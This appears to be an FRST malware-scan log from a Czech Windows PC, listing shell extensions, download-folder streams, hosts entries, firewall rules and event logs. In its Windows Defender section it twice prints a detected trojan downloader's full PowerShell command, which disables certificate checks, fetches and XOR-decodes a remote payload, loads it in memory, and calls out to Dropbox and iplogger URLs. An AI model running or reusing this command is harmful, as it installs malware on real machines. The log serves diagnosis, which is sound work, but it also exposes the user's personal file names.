ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2012-11-26] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )

==================== Codecs (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Drivers32: [vidc.ffds] => C:\Windows\SysWOW64\ff_vfw.dll [7680 2009-12-17] () [File not signed]

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2019-10-12 11:29 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2019-10-12 11:29 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2019-02-28 17:03 - 2019-02-28 17:03 - 000424448 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll
2017-01-30 09:21 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2019-10-12 11:29 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Whitelisted) ==========

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: WebTransBHO Class -> {2DB66063-BB98-466A-AA0D-3E7ACF5ED853} -> C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM-x32 - WebTranslator - {BFC32E1D-EE75-4A48-BC60-104E11EE2431} - C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2016-07-16 12:47 - 2020-03-06 18:30 - 000001029 ____R C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 www.langsoft.cz
127.0.0.1 www.pctranslator.cz
177.9.78.49 ww1.moondoge.co.in
177.9.78.49 ww1.moonbit.co.in

2019-11-30 16:39 - 2019-11-30 16:44 - 000000439 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 192.168.0.1 - 1.1.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run32: => "Dropbox"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "Poslat do aplikace OneNote.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "IQTray.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\Run: => "Microsoft Software Essentials"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [{793400D7-7C54-425B-9BD7-60F988299959}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{D34719B9-E1F9-42F6-BA3A-AA6AF2D45F2E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{2F9D3059-4454-4A07-BEE5-D6684A9BC8B9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{033BC72C-1DEC-4D1D-87CB-14942A26DDDB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [{ADECB0C0-D817-4AFC-AB5F-3E7FDA043DFE}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{CC710CB0-69B1-4D2B-9AAE-B86204635A9F}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{DE047D0E-57E7-42E5-852F-33C6129D3B85}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [UDP Query User{0AAFD932-9B41-400A-B798-B7F6A5298120}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [TCP Query User{0FFA7186-061D-43D7-922F-73C9FE27F461}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{D7909A0E-59A3-44AA-AD21-357E7A504E90}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [TCP Query User{60724E25-F8FD-44AA-9BC9-A2ADC8EC3C89}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [{C9001568-7E61-4092-92AC-A2A34F885F7B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{4E0915DD-85DC-4816-9616-A952C0C0C79C}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1AB3D34D-2096-4639-A6F4-DB0021276C1B}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{8A8D7038-61CD-44CF-88BD-3B4A6221113F}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6E0C9F16-EE9A-44B8-9451-7D5FB88A5D9D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{EB36692E-B7B2-42BD-BC9B-B5B9C427A112}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{2E494270-3352-4EE4-9BEB-DFDABEB0B492}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{CE8260C1-93C7-47AF-97D4-687806A341AB}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{41A0FD6F-32C7-4629-843F-F84BD1CF7F57}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [UDP Query User{F7DDB9BD-EF26-4906-BD31-A72205B5AFBB}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [TCP Query User{2996E712-43FC-4FF8-8202-BA352CC77FF9}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [UDP Query User{E5D79571-6F5B-47A0-BB49-86E0BBEFF6CD}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [{ECECF438-162A-4245-9BA1-DB6164C401DB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Restore Points =========================

03-01-2021 20:48:22 Naplánovaný kontrolní bod
09-01-2021 18:42:24 Removed IQ Option
13-01-2021 21:32:33 Instalační služba modulů systému Windows

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (01/20/2021 08:00:00 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/19/2021 07:14:25 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/18/2021 01:04:48 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/17/2021 08:09:58 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/16/2021 07:48:31 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0


System errors:
=============
Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.

Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.

Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.


Windows Defender:
===================================
Date: 2021-01-20 18:14:17.7510000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2534.0, AS: 1.329.2534.0, NIS: 1.329.2534.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 17:09:21.2090000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2528.0, AS: 1.329.2528.0, NIS: 1.329.2528.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 15:18:54.2110000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {5BABBB36-9445-4077-8621-59FC0CF7C04A}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-20 11:15:09.7920000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
